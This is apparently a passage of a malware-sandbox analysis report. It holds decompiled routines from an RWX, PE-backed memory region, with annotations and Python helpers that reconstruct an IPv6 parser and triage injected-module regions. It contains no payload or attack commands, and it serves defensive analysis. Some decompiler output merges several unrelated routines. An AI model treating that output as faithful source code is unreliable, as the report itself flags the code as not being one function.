                                                											_v16 = _v16 & 0x00000000;
                                                											L28:
                                                											if(_v28 == 0) {
                                                												goto L20;
                                                											}
                                                											_t177 = _v24;
                                                											if(_t177 != 0) {
                                                												if(_v12 > 3) {
                                                													L6:
                                                													return 0xc000000d;
                                                												}
                                                												_t132 = E02550CFA(_v28, 0, 0xa);
                                                												_t183 = _t183 + 0xc;
                                                												if(_t132 > 0xff) {
                                                													goto L6;
                                                												}
                                                												 *((char*)(_t177 + _v20 * 2 + _a12 - 1)) = _t132;
                                                												goto L20;
                                                											}
                                                											if(_v12 > 4) {
                                                												goto L6;
                                                											}
                                                											_t133 = E02550CFA(_v28, 0, 0x10);
                                                											_t183 = _t183 + 0xc;
                                                											_v20 = _v20 + 1;
                                                											 *((short*)(_a12 + _v20 * 2)) = _t133;
                                                											goto L20;
                                                										}
                                                									}
                                                									goto L41;
                                                								}
                                                								if(_v24 > 0 || _v8 > 6) {
                                                									goto L41;
                                                								} else {
                                                									_t130 = _t179 + 1;
                                                									if( *_t130 == _t141) {
                                                										if(_v32 != 0) {
                                                											goto L41;
                                                										}
                                                										_v32 = _v8 + 1;
                                                										_t156 = 2;
                                                										_v8 = _v8 + _t156;
                                                										L34:
                                                										_t179 = _t130;
                                                										_v16 = _t156;
                                                										goto L28;
                                                									}
                                                									_v8 = _v8 + 1;
                                                									goto L27;
                                                								}
                                                							} else {
                                                								_v12 = _v12 + 1;
                                                								if(_v24 > 0) {
                                                									goto L41;
                                                								}
                                                								_a7 = 1;
                                                								goto L20;
                                                							}
                                                						} else {
                                                							_v12 = _v12 + 1;
                                                							L20:
                                                							_t179 = _t179 + 1;
                                                							_t141 =  *_t179;
                                                							if(_t141 == 0) {
                                                								goto L41;
                                                							}
                                                							continue;
                                                						}
                                                						L7:
                                                						if(_t141 == 0x3a) {
                                                							if(_v24 > 0 || _v8 > 0) {
                                                								goto L41;
                                                							} else {
                                                								_t130 = _t179 + 1;
                                                								if( *_t130 != _t141) {
                                                									goto L41;
                                                								}
                                                								_v20 = _v20 + 1;
                                                								_t156 = 2;
                                                								_v32 = 1;
                                                								_v8 = _t156;
                                                								 *((short*)(_a12 + _v20 * 2)) = 0;
                                                								goto L34;
                                                							}
                                                						}
                                                						L8:
                                                						if(_v8 > 7) {
                                                							goto L41;
                                                						}
                                                						_t142 = _t141;
                                                						if(E025506BA(_t123, _t141) == 0 || _t124 == 0) {
                                                							if(E025506BA(_t124, _t142) == 0 || E02550A5B(_t125, _t142) == 0 || _v24 > 0) {
                                                								goto L41;
                                                							} else {
                                                								_t128 = 1;
                                                								_a7 = 1;
                                                								_v28 = _t179;
                                                								_v16 = 1;
                                                								_v12 = 1;
                                                								L39:
                                                								if(_v16 == _t128) {
                                                									goto L20;
                                                								}
                                                								goto L28;
                                                							}
                                                						} else {
                                                							_a7 = 0;
                                                							_v28 = _t179;
                                                							_v16 = 1;
                                                							_v12 = 1;
                                                							goto L20;
                                                						}
                                                					}
                                                				}
                                                				L1:
                                                				_t123 = _t108 == 1;
                                                				if(_t108 == 1) {
                                                					goto L8;
                                                				}
                                                				_t128 = 1;
                                                				goto L39;
                                                			}
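The decompiled routine E02550B15 above has the shape of an IPv6 text-to-address parser: 0x3a (':') and 0x2e ('.') are the only separators it branches on, a "::" run is detected by peeking at the next character, hex groups are rejected past four digits (_v12 > 4), dotted octets past three digits or 0xff, the group counter is capped at 8, the trailing move-and-zero-fill in block L47 is the "::" expansion, and 0xC000000D (STATUS_INVALID_PARAMETER) is its failure status. The Python below is an added reconstruction of those acceptance rules written for this page; it is not the report's code and not Microsoft's implementation, and identifying the routine as an IPv6 parser is an inference from the visible checks, not something the report states. It returns the address in network byte order (the decompiled code writes native 16-bit shorts), which is a choice made here for readability.

```python
# Added reconstruction of the acceptance rules visible in the decompiled routine
# E02550B15 above. Written for this page; it is not the report's code and not
# Microsoft's implementation. Treating the routine as an IPv6 text parser is an
# inference from its ':' / '.' handling and its 0xC000000D failure status.

STATUS_SUCCESS = 0x00000000
STATUS_INVALID_PARAMETER = 0xC000000D  # the failure status the decompiled code returns (label L6)

HEXDIGITS = frozenset("0123456789abcdefABCDEF")
DECDIGITS = frozenset("0123456789")


def _hex_group(tok: str):
    """One 16-bit group: one to four hex digits (a fifth digit is rejected)."""
    if not 1 <= len(tok) <= 4 or not all(c in HEXDIGITS for c in tok):
        return None
    return int(tok, 16)


def _dotted_quad(tok: str):
    """Trailing IPv4 part: exactly four decimal octets, one to three digits each,
    each <= 0xff. Returns the two 16-bit groups it occupies."""
    parts = tok.split(".")
    if len(parts) != 4:
        return None
    octets = []
    for p in parts:
        if not 1 <= len(p) <= 3 or not all(c in DECDIGITS for c in p):
            return None
        value = int(p, 10)
        if value > 0xFF:
            return None
        octets.append(value)
    return [(octets[0] << 8) | octets[1], (octets[2] << 8) | octets[3]]


def parse_ipv6(text: str):
    """Return (ntstatus, address). address is the 16-byte value in network
    byte order on success and None on failure."""
    if text.count("::") > 1:            # only one run of groups may be compressed
        return STATUS_INVALID_PARAMETER, None
    if "::" in text:
        head, tail = text.split("::")
        gap = True
    else:
        head, tail, gap = text, "", False

    before, after = [], []
    segments = (
        (before, head.split(":") if head else [], not gap),  # a quad may end the head only when there is no "::"
        (after, tail.split(":") if tail else [], True),
    )
    for dest, toks, quad_allowed in segments:
        for idx, tok in enumerate(toks):
            if "." in tok:
                is_last = idx == len(toks) - 1
                # a dotted quad must be the final element and may follow at most six groups
                if not (is_last and quad_allowed) or len(before) + len(after) > 6:
                    return STATUS_INVALID_PARAMETER, None
                quad = _dotted_quad(tok)
                if quad is None:
                    return STATUS_INVALID_PARAMETER, None
                dest.extend(quad)
            else:
                group = _hex_group(tok)   # an empty token (":::", "1::2:") fails here as well
                if group is None:
                    return STATUS_INVALID_PARAMETER, None
                dest.append(group)

    explicit = len(before) + len(after)
    if gap:
        if explicit > 7:                # "::" must stand for at least one group
            return STATUS_INVALID_PARAMETER, None
        # the zero-fill the decompiled L47 block performs after moving the tail groups to the end
        groups = before + [0] * (8 - explicit) + after
    else:
        if explicit != 8:
            return STATUS_INVALID_PARAMETER, None
        groups = before
    return STATUS_SUCCESS, b"".join(g.to_bytes(2, "big") for g in groups)


if __name__ == "__main__":
    # constructed sample inputs, valid and invalid
    for sample in ("::1", "2001:db8::1", "::ffff:192.0.2.1", "1:2:3:4:5:6:7:8:9", "12345::"):
        status, addr = parse_ipv6(sample)
        print(f"{sample:24} -> 0x{status:08X} {addr.hex() if addr else '-'}")
```

The invalid cases in the usage block are the ones the decompiled checks reject explicitly: a ninth group, a five-digit hex group, an octet above 0xff, a second "::", and a dotted quad that is not the last element.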

                                                0x02550b21
                                                0x02550b24
                                                0x02550b27
                                                0x02550b2a
                                                0x02550b2d
                                                0x02550b30
                                                0x02550b33
                                                0x02550b36
                                                0x02550b39
                                                0x02550b3e
                                                0x02550c65
                                                0x02550c68
                                                0x02550c6a
                                                0x02550c6f
                                                0x0257eb42
                                                0x00000000
                                                0x00000000
                                                0x0257eb48
                                                0x0257eb48
                                                0x02550c75
                                                0x02550c7a
                                                0x0257eb54
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x0257eb5a
                                                0x02550c80
                                                0x02550c84
                                                0x0257eb98
                                                0x00000000
                                                 [Graph view (interactive widget, not reproduced): node addresses in the ranges 0x025509f8 to 0x02550cec and 0x0257eaa0 to 0x0257eba6]

                                                 Memory Dump Source
                                                 • Source File: 00000007.00000002.679830013.0000000002500000.00000040.00000001.sdmp, Offset: 024F0000, based on PE: true
                                                 • Associated: 00000007.00000002.679822827.00000000024F0000.00000040.00000001.sdmp
                                                 • Associated: 00000007.00000002.679893612.00000000025E0000.00000040.00000001.sdmp
                                                 • Associated: 00000007.00000002.679900762.00000000025F0000.00000040.00000001.sdmp
                                                 • Associated: 00000007.00000002.679907981.00000000025F4000.00000040.00000001.sdmp
                                                 • Associated: 00000007.00000002.679914891.00000000025F7000.00000040.00000001.sdmp
                                                 • Associated: 00000007.00000002.679921302.0000000002600000.00000040.00000001.sdmp
                                                 • Associated: 00000007.00000002.679951607.0000000002660000.00000040.00000001.sdmp
                                                 Similarity
                                                 • API ID: __fassign
                                                 • String ID: .$:$:
                                                 • API String ID: 3965848254-2308638275
                                                 • Opcode ID: b15de34944a390e3fa5e98378680e2de18144008d38fd4e6897fe19ea25b26ab
                                                 • Instruction ID: bf55e5ef4ec58f4ae53b0e0fb8caef544481422f0840f54bbfd95560fb0142b0
                                                 • Opcode Fuzzy Hash: b15de34944a390e3fa5e98378680e2de18144008d38fd4e6897fe19ea25b26ab
                                                 • Instruction Fuzzy Hash: F7A1807190032ADACF25CF58C8647BEBBB9BF4A318F24846BDC42A72C0D7349645CB59
                                                 Uniqueness
                                                 • Uniqueness Score: -1.00%
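The dump descriptors above carry a region's base address and page protection inside the .sdmp file name: 0x00000040 is PAGE_EXECUTE_READWRITE, and a writable, executable region that is "based on PE" is the footprint a manually mapped module leaves behind, which is worth separating from plain RWX heap when triaging a report like this one. The Python below is an added triage helper, not part of the Joe Sandbox report or its tooling: it parses descriptor lines of the form listed here and returns one finding per RWX region, tagging the PE-backed ones. The field order assumed for the file name (process, dump pass, timestamp, base, protection, type) is read off the values shown and is an assumption; the protection constants are the winnt.h values.

```python
import re
from dataclasses import dataclass
from typing import List, Optional

# Page protection constants from winnt.h
PAGE_NOACCESS = 0x01
PAGE_READONLY = 0x02
PAGE_READWRITE = 0x04
PAGE_WRITECOPY = 0x08
PAGE_EXECUTE = 0x10
PAGE_EXECUTE_READ = 0x20
PAGE_EXECUTE_READWRITE = 0x40
PAGE_EXECUTE_WRITECOPY = 0x80
PAGE_GUARD = 0x100
PAGE_NOCACHE = 0x200
PAGE_WRITECOMBINE = 0x400

_BASE_NAMES = {
    PAGE_NOACCESS: "PAGE_NOACCESS",
    PAGE_READONLY: "PAGE_READONLY",
    PAGE_READWRITE: "PAGE_READWRITE",
    PAGE_WRITECOPY: "PAGE_WRITECOPY",
    PAGE_EXECUTE: "PAGE_EXECUTE",
    PAGE_EXECUTE_READ: "PAGE_EXECUTE_READ",
    PAGE_EXECUTE_READWRITE: "PAGE_EXECUTE_READWRITE",
    PAGE_EXECUTE_WRITECOPY: "PAGE_EXECUTE_WRITECOPY",
}
_MODIFIER_NAMES = {
    PAGE_GUARD: "PAGE_GUARD",
    PAGE_NOCACHE: "PAGE_NOCACHE",
    PAGE_WRITECOMBINE: "PAGE_WRITECOMBINE",
}
EXEC_MASK = PAGE_EXECUTE | PAGE_EXECUTE_READ | PAGE_EXECUTE_READWRITE | PAGE_EXECUTE_WRITECOPY
WRITE_MASK = PAGE_READWRITE | PAGE_WRITECOPY | PAGE_EXECUTE_READWRITE | PAGE_EXECUTE_WRITECOPY

# Assumed .sdmp name layout: <process>.<pass>.<timestamp>.<base>.<protect>.<type>.sdmp
_DESCRIPTOR_RE = re.compile(
    r"(?P<process>\d{8})\.(?P<dumppass>\d{8})\.(?P<ts>\d+)\."
    r"(?P<base>[0-9a-fA-F]{16})\.(?P<protect>[0-9a-fA-F]{8})\.(?P<rtype>[0-9a-fA-F]{8})\.sdmp"
)
_PE_RE = re.compile(r"based on PE:\s*(true|false)", re.IGNORECASE)
_OFFSET_RE = re.compile(r"Offset:\s*([0-9a-fA-F]+)")


def protection_name(protect: int) -> str:
    """Render a raw protection value as winnt.h names, e.g. 0x104 -> PAGE_READWRITE|PAGE_GUARD."""
    base = protect & 0xFF
    names = [_BASE_NAMES.get(base, f"0x{base:02x}")]
    names += [name for flag, name in _MODIFIER_NAMES.items() if protect & flag]
    return "|".join(names)


@dataclass(frozen=True)
class DumpRegion:
    process: int
    dump_pass: int
    base: int
    protect: int
    region_type: int
    based_on_pe: Optional[bool]   # None when the line does not say
    image_base: Optional[int]     # the "Offset:" value, when present

    @property
    def writable(self) -> bool:
        return bool(self.protect & WRITE_MASK)

    @property
    def executable(self) -> bool:
        return bool(self.protect & EXEC_MASK)


def parse_descriptor(line: str) -> Optional[DumpRegion]:
    """Parse one report line carrying an .sdmp descriptor; None if the line has none."""
    m = _DESCRIPTOR_RE.search(line)
    if not m:
        return None
    pe = _PE_RE.search(line)
    off = _OFFSET_RE.search(line)
    return DumpRegion(
        process=int(m["process"]),
        dump_pass=int(m["dumppass"]),
        base=int(m["base"], 16),
        protect=int(m["protect"], 16),
        region_type=int(m["rtype"], 16),
        based_on_pe=(pe.group(1).lower() == "true") if pe else None,
        image_base=int(off.group(1), 16) if off else None,
    )


def triage(lines: List[str]) -> List[str]:
    """One finding per writable+executable region; PE-backed RWX is tagged as the stronger signal."""
    findings = []
    for line in lines:
        region = parse_descriptor(line)
        if region is None or not (region.writable and region.executable):
            continue
        tag = "RWX+PE" if region.based_on_pe else "RWX"
        extra = f" image_base=0x{region.image_base:08x}" if region.image_base is not None else ""
        findings.append(
            f"{tag} process#{region.process} base=0x{region.base:08x} "
            f"{protection_name(region.protect)}{extra}"
        )
    return findings


# Sample input taken from the descriptor list in this report (constructed test data, links stripped)
REPORT_LINES = [
    "Source File: 00000007.00000002.679830013.0000000002500000.00000040.00000001.sdmp, "
    "Offset: 024F0000, based on PE: true",
    "Associated: 00000007.00000002.679822827.00000000024F0000.00000040.00000001.sdmp",
    "Associated: 00000007.00000002.679893612.00000000025E0000.00000040.00000001.sdmp",
    "Associated: 00000007.00000002.679900762.00000000025F0000.00000040.00000001.sdmp",
    "Associated: 00000007.00000002.679907981.00000000025F4000.00000040.00000001.sdmp",
    "Associated: 00000007.00000002.679914891.00000000025F7000.00000040.00000001.sdmp",
    "Associated: 00000007.00000002.679921302.0000000002600000.00000040.00000001.sdmp",
    "Associated: 00000007.00000002.679951607.0000000002660000.00000040.00000001.sdmp",
]

if __name__ == "__main__":
    for finding in triage(REPORT_LINES):
        print(finding)
```

Run over the eight descriptors above, every region is PAGE_EXECUTE_READWRITE, and only the 0x02500000 region is reported as PE-backed with image base 0x024F0000; when feeding a whole report in, the RWX+PE findings are the ones to pull first.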

                                                 C-Code - Quality: 49%
                                                 			/*
                                                 			 * Decompiler output for the routine at 0x02550554 in the dumped image above.
                                                 			 * Identification inferred from the code, not from symbols: the offsets read
                                                 			 * from _a4 match the 32-bit RTL_RESOURCE layout (0x18 SharedSemaphore,
                                                 			 * 0x1c NumberOfWaitingShared, 0x20 ExclusiveSemaphore, 0x24 NumberOfWaitingExclusive,
                                                 			 * 0x28 NumberOfActive, 0x2c ExclusiveOwnerThread, 0x30 Flags, 0x34 DebugInfo,
                                                 			 * with DebugInfo+0x14 being ContentionCount), fs:[0x18]+0x24 is TEB.ClientId.UniqueThread,
                                                 			 * and the "RTL: Acquire Shared Sem Timeout" / "RTL: Acquire Exclusive Sem Timeout"
                                                 			 * strings are those of ntdll's RtlAcquireResourceShared / RtlAcquireResourceExclusive,
                                                 			 * so _a4 is the RTL_RESOURCE pointer and _a8 the Wait flag (the early "return 0"
                                                 			 * when _a8 == 0 is the non-blocking path). The decompiler has run several adjacent
                                                 			 * routines together across the int3 padding, so the body below is not one function.
                                                 			 */
                                                 			E02550554(signed int _a4, char _a8) {
                                                				void* __ebx;
                                                				void* __edi;
                                                				void* __esi;
                                                				signed int* _t49;
                                                				signed int _t51;
                                                				signed int _t56;
                                                				signed int _t58;
                                                				signed int _t61;
                                                				signed int _t63;
                                                				void* _t66;
                                                				intOrPtr _t67;
                                                				signed int _t70;
                                                				void* _t75;
                                                				signed int _t81;
                                                				signed int _t84;
                                                				void* _t86;
                                                				signed int _t93;
                                                				signed int _t96;
                                                				intOrPtr _t105;
                                                				signed int _t107;
                                                				void* _t110;
                                                				signed int _t115;
                                                				signed int* _t119;
                                                				void* _t125;
                                                				void* _t126;
                                                				signed int _t128;
                                                				signed int _t130;
                                                				signed int _t138;
                                                				signed int _t144;
                                                				void* _t158;
                                                				void* _t159;
                                                				void* _t160;
                                                
                                                				_t96 = _a4;
                                                				_t115 =  *(_t96 + 0x28);
                                                				_push(_t138);
                                                				if(_t115 < 0) {
                                                					_t105 =  *[fs:0x18];
                                                					__eflags =  *((intOrPtr*)(_t96 + 0x2c)) -  *((intOrPtr*)(_t105 + 0x24));
                                                					if( *((intOrPtr*)(_t96 + 0x2c)) !=  *((intOrPtr*)(_t105 + 0x24))) {
                                                						goto L6;
                                                					} else {
                                                						__eflags = _t115 | 0xffffffff;
                                                						asm("lock xadd [eax], edx");
                                                						return 1;
                                                					}
                                                				} else {
                                                					L6:
                                                					_push(_t128);
                                                					while(1) {
                                                						L7:
                                                						__eflags = _t115;
                                                						if(_t115 >= 0) {
                                                							break;
                                                						}
                                                						__eflags = _a8;
                                                						if(_a8 == 0) {
                                                							__eflags = 0;
                                                							return 0;
                                                						} else {
                                                							 *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) =  *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) + 1;
                                                							_t49 = _t96 + 0x1c;
                                                							_t106 = 1;
                                                							asm("lock xadd [edx], ecx");
                                                							_t115 =  *(_t96 + 0x28);
                                                							__eflags = _t115;
                                                							if(_t115 < 0) {
                                                								L23:
                                                								_t130 = 0;
                                                								__eflags = 0;
                                                								while(1) {
                                                									_t118 =  *(_t96 + 0x30) & 0x00000001;
                                                									asm("sbb esi, esi");
                                                									_t144 =  !( ~( *(_t96 + 0x30) & 1)) & 0x025f01c0;
                                                									_push(_t144);
                                                									_push(0);
                                                									_t51 = E0250F8CC( *((intOrPtr*)(_t96 + 0x18)));
                                                									__eflags = _t51 - 0x102;
                                                									if(_t51 != 0x102) {
                                                										break;
                                                									}
                                                									_t106 =  *(_t144 + 4);
                                                									_t126 =  *_t144;
                                                									_t86 = E02554FC0(_t126,  *(_t144 + 4), 0xff676980, 0xffffffff);
                                                									_push(_t126);
                                                									_push(_t86);
                                                									E02563F92(0x65, 0, "RTL: Acquire Shared Sem Timeout %d(%I64u secs)\n", _t130);
                                                									E02563F92(0x65, 0, "RTL: Resource at %p\n", _t96);
                                                									_t130 = _t130 + 1;
                                                									_t160 = _t158 + 0x28;
                                                									__eflags = _t130 - 2;
                                                									if(__eflags > 0) {
                                                										E0259217A(_t106, __eflags, _t96);
                                                									}
                                                									_push("RTL: Re-Waiting\n");
                                                									_push(0);
                                                									_push(0x65);
                                                									E02563F92();
                                                									_t158 = _t160 + 0xc;
                                                								}
                                                								__eflags = _t51;
                                                								if(__eflags < 0) {
                                                									_push(_t51);
                                                									E02553915(_t96, _t106, _t118, _t130, _t144, __eflags);
                                                									asm("int3");
                                                									while(1) {
                                                										L32:
                                                										__eflags = _a8;
                                                										if(_a8 == 0) {
                                                											break;
                                                										}
                                                										 *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) =  *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) + 1;
                                                										_t119 = _t96 + 0x24;
                                                										_t107 = 1;
                                                										asm("lock xadd [eax], ecx");
                                                										_t56 =  *(_t96 + 0x28);
                                                										_a4 = _t56;
                                                										__eflags = _t56;
                                                										if(_t56 != 0) {
                                                											L40:
                                                											_t128 = 0;
                                                											__eflags = 0;
                                                											while(1) {
                                                												_t121 =  *(_t96 + 0x30) & 0x00000001;
                                                												asm("sbb esi, esi");
                                                												_t138 =  !( ~( *(_t96 + 0x30) & 1)) & 0x025f01c0;
                                                												_push(_t138);
                                                												_push(0);
                                                												_t58 = E0250F8CC( *((intOrPtr*)(_t96 + 0x20)));
                                                												__eflags = _t58 - 0x102;
                                                												if(_t58 != 0x102) {
                                                													break;
                                                												}
                                                												_t107 =  *(_t138 + 4);
                                                												_t125 =  *_t138;
                                                												_t75 = E02554FC0(_t125, _t107, 0xff676980, 0xffffffff);
                                                												_push(_t125);
                                                												_push(_t75);
                                                												E02563F92(0x65, 0, "RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)\n", _t128);
                                                												E02563F92(0x65, 0, "RTL: Resource at %p\n", _t96);
                                                												_t128 = _t128 + 1;
                                                												_t159 = _t158 + 0x28;
                                                												__eflags = _t128 - 2;
                                                												if(__eflags > 0) {
                                                													E0259217A(_t107, __eflags, _t96);
                                                												}
                                                												_push("RTL: Re-Waiting\n");
                                                												_push(0);
                                                												_push(0x65);
                                                												E02563F92();
                                                												_t158 = _t159 + 0xc;
                                                											}
                                                											__eflags = _t58;
                                                											if(__eflags < 0) {
                                                												_push(_t58);
                                                												E02553915(_t96, _t107, _t121, _t128, _t138, __eflags);
                                                												asm("int3");
                                                												_t61 =  *_t107;
                                                												 *_t107 = 0;
                                                												__eflags = _t61;
                                                												if(_t61 == 0) {
                                                													L1:
                                                													_t63 = E02535384(_t138 + 0x24);
                                                													if(_t63 != 0) {
                                                														goto L52;
                                                													} else {
                                                														goto L2;
                                                													}
                                                												} else {
                                                													_t123 =  *((intOrPtr*)(_t138 + 0x18));
                                                													_push( &_a4);
                                                													_push(_t61);
                                                													_t70 = E0250F970( *((intOrPtr*)(_t138 + 0x18)));
                                                													__eflags = _t70;
                                                													if(__eflags >= 0) {
                                                														goto L1;
                                                													} else {
                                                														_push(_t70);
                                                														E02553915(_t96,  &_a4, _t123, _t128, _t138, __eflags);
                                                														L52:
                                                														_t122 =  *((intOrPtr*)(_t138 + 0x20));
                                                														_push( &_a4);
                                                														_push(1);
                                                														_t63 = E0250F970( *((intOrPtr*)(_t138 + 0x20)));
                                                														__eflags = _t63;
                                                														if(__eflags >= 0) {
                                                															L2:
                                                															return _t63;
                                                														} else {
                                                															_push(_t63);
                                                															E02553915(_t96,  &_a4, _t122, _t128, _t138, __eflags);
                                                															_t109 =  *((intOrPtr*)(_t138 + 0x20));
                                                															_push( &_a4);
                                                															_push(1);
                                                															_t63 = E0250F970( *((intOrPtr*)(_t138 + 0x20)));
                                                															__eflags = _t63;
                                                															if(__eflags >= 0) {
                                                																goto L2;
                                                															} else {
                                                																_push(_t63);
                                                																_t66 = E02553915(_t96, _t109, _t122, _t128, _t138, __eflags);
                                                																asm("int3");
                                                																while(1) {
                                                																	_t110 = _t66;
                                                																	__eflags = _t66 - 1;
                                                																	if(_t66 != 1) {
                                                																		break;
                                                																	}
                                                																	_t128 = _t128 | 0xffffffff;
                                                																	_t66 = _t110;
                                                																	asm("lock cmpxchg [ebx], edi");
                                                																	__eflags = _t66 - _t110;
                                                																	if(_t66 != _t110) {
                                                																		continue;
                                                																	} else {
                                                																		_t67 =  *[fs:0x18];
                                                																		 *((intOrPtr*)(_t138 + 0x2c)) =  *((intOrPtr*)(_t67 + 0x24));
                                                																		return _t67;
                                                																	}
                                                																	goto L58;
                                                																}
                                                																E02535329(_t110, _t138);
                                                																return E025353A5(_t138, 1);
                                                															}
                                                														}
                                                													}
                                                												}
                                                											} else {
                                                												_t56 =  *(_t96 + 0x28);
                                                												goto L3;
                                                											}
                                                										} else {
                                                											_t107 =  *_t119;
                                                											__eflags = _t107;
                                                											if(__eflags > 0) {
                                                												while(1) {
                                                													_t81 = _t107;
                                                													asm("lock cmpxchg [edi], esi");
                                                													__eflags = _t81 - _t107;
                                                													if(_t81 == _t107) {
                                                														break;
                                                													}
                                                													_t107 = _t81;
                                                													__eflags = _t81;
                                                													if(_t81 > 0) {
                                                														continue;
                                                													}
                                                													break;
                                                												}
                                                												_t56 = _a4;
                                                												__eflags = _t107;
                                                											}
                                                											if(__eflags != 0) {
                                                												while(1) {
                                                													L3:
                                                													__eflags = _t56;
                                                													if(_t56 != 0) {
                                                														goto L32;
                                                													}
                                                													_t107 = _t107 | 0xffffffff;
                                                													_t56 = 0;
                                                													asm("lock cmpxchg [edx], ecx");
                                                													__eflags = 0;
                                                													if(0 != 0) {
                                                														continue;
                                                													} else {
                                                														 *((intOrPtr*)(_t96 + 0x2c)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
                                                														return 1;
                                                													}
                                                													goto L58;
                                                												}
                                                												continue;
                                                											} else {
                                                												goto L40;
                                                											}
                                                										}
                                                										goto L58;
                                                									}
                                                									__eflags = 0;
                                                									return 0;
                                                								} else {
                                                									_t115 =  *(_t96 + 0x28);
                                                									continue;
                                                								}
                                                							} else {
                                                								_t106 =  *_t49;
                                                								__eflags = _t106;
                                                								if(__eflags > 0) {
                                                									while(1) {
                                                										_t93 = _t106;
                                                										asm("lock cmpxchg [edi], esi");
                                                										__eflags = _t93 - _t106;
                                                										if(_t93 == _t106) {
                                                											break;
                                                										}
                                                										_t106 = _t93;
                                                										__eflags = _t93;
                                                										if(_t93 > 0) {
                                                											continue;
                                                										}
                                                										break;
                                                									}
                                                									__eflags = _t106;
                                                								}
                                                								if(__eflags != 0) {
                                                									continue;
                                                								} else {
                                                									goto L23;
                                                								}
                                                							}
                                                						}
                                                						goto L58;
                                                					}
                                                					_t84 = _t115;
                                                					asm("lock cmpxchg [esi], ecx");
                                                					__eflags = _t84 - _t115;
                                                					if(_t84 != _t115) {
                                                						_t115 = _t84;
                                                						goto L7;
                                                					} else {
                                                						return 1;
                                                					}
                                                				}
                                                				L58:
                                                			}
                                                Instruction addresses (column flattened by extraction; one address per decompiled line above): 0x0255055a-0x025505f3, 0x02572178-0x025723d7, 0x02535367-0x025353ea, 0x02569153-0x02569176

                                                APIs
                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 02572206
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.679830013.0000000002500000.00000040.00000001.sdmp, Offset: 024F0000, based on PE: true
                                                • Associated: 00000007.00000002.679822827.00000000024F0000.00000040.00000001.sdmp
                                                • Associated: 00000007.00000002.679893612.00000000025E0000.00000040.00000001.sdmp
                                                • Associated: 00000007.00000002.679900762.00000000025F0000.00000040.00000001.sdmp
                                                • Associated: 00000007.00000002.679907981.00000000025F4000.00000040.00000001.sdmp
                                                • Associated: 00000007.00000002.679914891.00000000025F7000.00000040.00000001.sdmp
                                                • Associated: 00000007.00000002.679921302.0000000002600000.00000040.00000001.sdmp
                                                • Associated: 00000007.00000002.679951607.0000000002660000.00000040.00000001.sdmp
                                                Similarity
                                                • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                • API String ID: 885266447-4236105082
                                                • Opcode ID: af4af9e1bc2c2644f412290bb046c56a7201b6d3a5bd9db7cae22f2f179f6c1c
                                                • Instruction ID: eda0bd69ed15786afe4c938c65575c429e105952c11f934fcae7e0c502d2afa7
                                                • Opcode Fuzzy Hash: af4af9e1bc2c2644f412290bb046c56a7201b6d3a5bd9db7cae22f2f179f6c1c
                                                • Instruction Fuzzy Hash: A5514C717402126FEB14CE18DC80FA677AABFD4720F218259ED49DB2C5EA31EC418B9C
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 64%
                                                			E025514C0(void* __ecx, void* __edx, intOrPtr* _a4, intOrPtr _a8, signed int _a12, intOrPtr _a16, intOrPtr* _a20) {
                                                				signed int _v8;
                                                				char _v10;
                                                				char _v140;
                                                				void* __ebx;
                                                				void* __edi;
                                                				void* __esi;
                                                				signed int _t24;
                                                				void* _t26;
                                                				signed int _t29;
                                                				signed int _t34;
                                                				signed int _t40;
                                                				intOrPtr _t45;
                                                				void* _t51;
                                                				intOrPtr* _t52;
                                                				void* _t54;
                                                				signed int _t57;
                                                				void* _t58;
                                                
                                                				_t51 = __edx;
                                                				_t24 =  *0x25f2088; // 0x76505f1a
                                                				_v8 = _t24 ^ _t57;
                                                				_t45 = _a16;
                                                				_t53 = _a4;
                                                				_t52 = _a20;
                                                				if(_a4 == 0 || _t52 == 0) {
                                                					L10:
                                                					_t26 = 0xc000000d;
                                                				} else {
                                                					if(_t45 == 0) {
                                                						if( *_t52 == _t45) {
                                                							goto L3;
                                                						} else {
                                                							goto L10;
                                                						}
                                                					} else {
                                                						L3:
                                                						_t28 =  &_v140;
                                                						if(_a12 != 0) {
                                                							_push("[");
                                                							_push(0x41);
                                                							_push( &_v140);
                                                							_t29 = E02547707();
                                                							_t58 = _t58 + 0xc;
                                                							_t28 = _t57 + _t29 * 2 - 0x88;
                                                						}
                                                						_t54 = E025513CB(_t53, _t28);
                                                						if(_a8 != 0) {
                                                							_t34 = E02547707(_t54,  &_v10 - _t54 >> 1, L"%%%u", _a8);
                                                							_t58 = _t58 + 0x10;
                                                							_t54 = _t54 + _t34 * 2;
                                                						}
                                                						if(_a12 != 0) {
                                                							_t40 = E02547707(_t54,  &_v10 - _t54 >> 1, L"]:%u", _a12 & 0x0000ffff);
                                                							_t58 = _t58 + 0x10;
                                                							_t54 = _t54 + _t40 * 2;
                                                						}
                                                						_t53 = (_t54 -  &_v140 >> 1) + 1;
                                                						 *_t52 = _t53;
                                                						if( *_t52 < _t53) {
                                                							goto L10;
                                                						} else {
                                                							E02512340(_t45,  &_v140, _t53 + _t53);
                                                							_t26 = 0;
                                                						}
                                                					}
                                                				}
                                                				return E0251E1B4(_t26, _t45, _v8 ^ _t57, _t51, _t52, _t53);
                                                			}
                                                Instruction addresses (column flattened by extraction; one address per decompiled line above): 0x025514c0-0x0255157a, 0x0257ea0f-0x0257ea58

                                                APIs
                                                • ___swprintf_l.LIBCMT ref: 0257EA22
                                                  • Part of subcall function 025513CB: ___swprintf_l.LIBCMT ref: 0255146B
                                                  • Part of subcall function 025513CB: ___swprintf_l.LIBCMT ref: 02551490
                                                • ___swprintf_l.LIBCMT ref: 0255156D
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.679830013.0000000002500000.00000040.00000001.sdmp, Offset: 024F0000, based on PE: true
                                                • Associated: 00000007.00000002.679822827.00000000024F0000.00000040.00000001.sdmp
